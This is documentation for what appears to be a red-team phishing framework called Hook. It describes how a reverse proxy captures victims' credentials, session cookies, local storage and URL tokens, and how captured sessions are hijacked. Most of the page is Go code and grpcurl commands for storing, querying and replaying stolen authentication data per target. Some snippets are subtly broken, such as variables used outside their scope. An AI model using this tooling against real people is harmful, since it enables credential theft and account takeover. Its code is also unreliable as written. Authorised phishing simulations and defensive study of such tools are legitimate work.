Documentation Index
Fetch the complete documentation index at: https://wiki.krkn.tech/llms.txt
Use this file to discover all available pages before exploring further.
Session Capture
Hook captures comprehensive session data during phishing attacks, including credentials, cookies, local storage, URL parameters, and full session hijack capabilities.
Overview
The Attack Plane stores all captured runtime data:
- Sessions - Victim interaction sessions
- Credentials - Captured usernames and passwords
- Cookies - Authentication and session cookies
- Local Storage - Browser local storage data
- URL Parameters - Query string parameters
- Hijacks - Full session hijack data
Sessions
Each victim interaction creates a session:
type Session struct {
Id string
Username string
Password string
Custom map[string]string
Params map[string]string
CookieTokens map[string]map[string]*CapturedCookie
BodyTokens map[string]string
HttpTokens map[string]string
RemoteAddr string
UserAgent string
IsDone bool
IsAuthUrl bool
CreatedAt time.Time
UpdatedAt time.Time
}
Session Operations
# Create session
grpcurl -d '{
"session": {
"raid_id": 1,
"target_id": 1,
"uuid": "abc123",
"ip_address": "192.168.1.100",
"user_agent": "Mozilla/5.0..."
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewSession
# Get sessions for raid
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetSessionsForRaid
# Get sessions for target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetSessionsForTarget
Credential Capture
Automatic Detection
The reverse proxy automatically detects credentials:
func (s *Session) searchForCredentials(params map[string]string) {
for key, value := range params {
// Check against username patterns
if s.Target.Username.Regex.MatchString(key) {
s.Username = value
}
// Check against password patterns
if s.Target.Password.Regex.MatchString(key) {
s.Password = value
}
}
}
Credential Storage
# Create credential
grpcurl -d '{
"credential": {
"session_id": 1,
"username": "john.doe@acme.com",
"password": "captured_password",
"source": "form_post"
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCredential
# Get credentials by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCredentialsBySessionID
# Get credentials by target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCredentialsByTargetID
Cookie Capture
Automatic Cookie Capture
Session cookies are captured automatically:
func captureCookies(resp *http.Response, session *Session) {
for _, cookie := range resp.Cookies() {
// Capture configured cookies
if s.Target.Cookies.Regex.MatchString(cookie.Name) {
captured := &CapturedCookie{
Name: cookie.Name,
Value: cookie.Value,
Domain: domain,
Path: cookie.Path,
HttpOnly: cookie.HttpOnly,
Expires: cookie.Expires,
}
session.AddCookieToken(domain, cookie.Name, captured)
}
// Also capture common session cookies
commonSessionCookies := regexp.MustCompile(`(?i)(session|sess|sid|token|auth|jwt|access|refresh|id)`)
if commonSessionCookies.MatchString(cookie.Name) {
session.AddCookieToken(domain, cookie.Name, captured)
}
}
}
Cookie Operations
# Create captured cookie
grpcurl -d '{
"cookie": {
"session_id": 1,
"name": "session_token",
"value": "abc123xyz",
"domain": "target.com",
"path": "/",
"secure": true,
"http_only": true
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedCookie
# Get cookies by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedCookiesBySessionID
# Get cookies by target
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedCookiesByTargetID
Local Storage Capture
Capture browser local storage data:
# Create captured local storage
grpcurl -d '{
"item": {
"session_id": 1,
"key": "auth_token",
"value": "eyJhbGciOiJIUzI1NiIs..."
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedLocalStorage
# Get local storage by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedLocalStorageBySessionID
URL Parameter Capture
Capture query string parameters:
# Create captured URL param
grpcurl -d '{
"param": {
"session_id": 1,
"key": "token",
"value": "reset_token_value"
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewCapturedURLParam
# Get URL params by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetCapturedURLParamsBySessionID
Session Hijacking
Hijack Process
After capturing authentication data, sessions can be hijacked:
func (h *Hijacker) HijackSession(s *Session) {
port := h.findOpenPort()
h.sessions[s.Id] = port
// Create proxy with captured session data
err := NewProxy(port, "0.0.0.0", s.Target.TargetURL, s.Cookies, s.Headers)
}
Hijack Operations
# Create hijack record
grpcurl -d '{
"hijack": {
"session_id": 1,
"target_site": "https://target.com",
"proxy_port": 10001
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewHijack
# Get hijacks by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetHijacksBySessionID
Click and Open Tracking
Clicks
# Create click
grpcurl -d '{
"click": {
"session_id": 1,
"page": "/login",
"ip_address": "192.168.1.100"
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewClick
# Get clicks by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetClicksBySessionID
Opens (Email Tracking)
# Create open
grpcurl -d '{
"open": {
"session_id": 1,
"ip_address": "192.168.1.100"
}
}' helm:61443 hook.atk_svc.AttackPlaneService/NewOpen
# Get opens by session
grpcurl -d '{"id": 1}' helm:61443 hook.atk_svc.AttackPlaneService/GetOpenBySessionID
Next Steps
